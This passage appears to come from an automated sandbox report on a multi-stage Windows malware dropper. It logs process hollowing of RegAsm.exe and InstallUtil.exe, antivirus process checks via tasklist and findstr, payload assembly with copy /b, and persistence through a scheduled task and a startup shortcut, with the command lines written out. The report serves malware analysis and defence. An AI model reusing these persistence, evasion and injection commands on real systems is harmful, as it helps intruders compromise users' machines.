                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB06F7 SetUnhandledExceptionFilter,24_2_00CB06F7
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00750811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00750811
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00753DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00753DF3
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00750594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00750594
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_007506F7 SetUnhandledExceptionFilter,27_2_007506F7
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0043A4FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0043A4FE
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_004215F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_004215F5
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00420C37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00420C37
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B2A765 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_02B2A765
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B1185C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_02B1185C
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B10E9E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_02B10E9E
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00C94780 CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualAllocEx,GetLastError,VirtualAllocEx,WriteProcessMemory,SetThreadContext,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,ResumeThread,24_2_00C94780
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 48A000
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11DC008
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DCD008
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E86008
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00609369 LogonUserW,19_2_00609369
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_005C5240
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00611AC6 SendInput,keybd_event,19_2_00611AC6
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_006151E2 mouse_event,19_2_006151E2
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless EJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif EJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /FJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exitJump to behavior
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_006088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_006088CD
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00614F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00614F1C
                        Source: Shipment.pif, 0000000B.00000000.2048496532.0000000000A06000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2073972138.0000000000666000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                        Source: GuardTrack.scrBinary or memory string: Shell_TrayWnd
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D885B cpuid 19_2_005D885B
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: EnumSystemLocalesW,24_2_00CC688E
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: EnumSystemLocalesW,24_2_00CC6843
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: EnumSystemLocalesW,24_2_00CBC03B
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,24_2_00CC69B4
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: EnumSystemLocalesW,24_2_00CC6929
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetLocaleInfoW,24_2_00CC6C07
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetLocaleInfoW,24_2_00CBC59D
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,24_2_00CC65A1
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,24_2_00CC6D2D
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetLocaleInfoW,24_2_00CC6E33
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,24_2_00CC6F02
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: EnumSystemLocalesW,27_2_00766843
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: EnumSystemLocalesW,27_2_0075C03B
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: EnumSystemLocalesW,27_2_0076688E
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: EnumSystemLocalesW,27_2_00766929
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_007669B4
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetLocaleInfoW,27_2_00766C07
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_00766D2D
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,27_2_007665A1
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetLocaleInfoW,27_2_0075C59D
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetLocaleInfoW,27_2_00766E33
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,27_2_00766F02
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeQueries volume information: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe VolumeInformation
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeQueries volume information: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
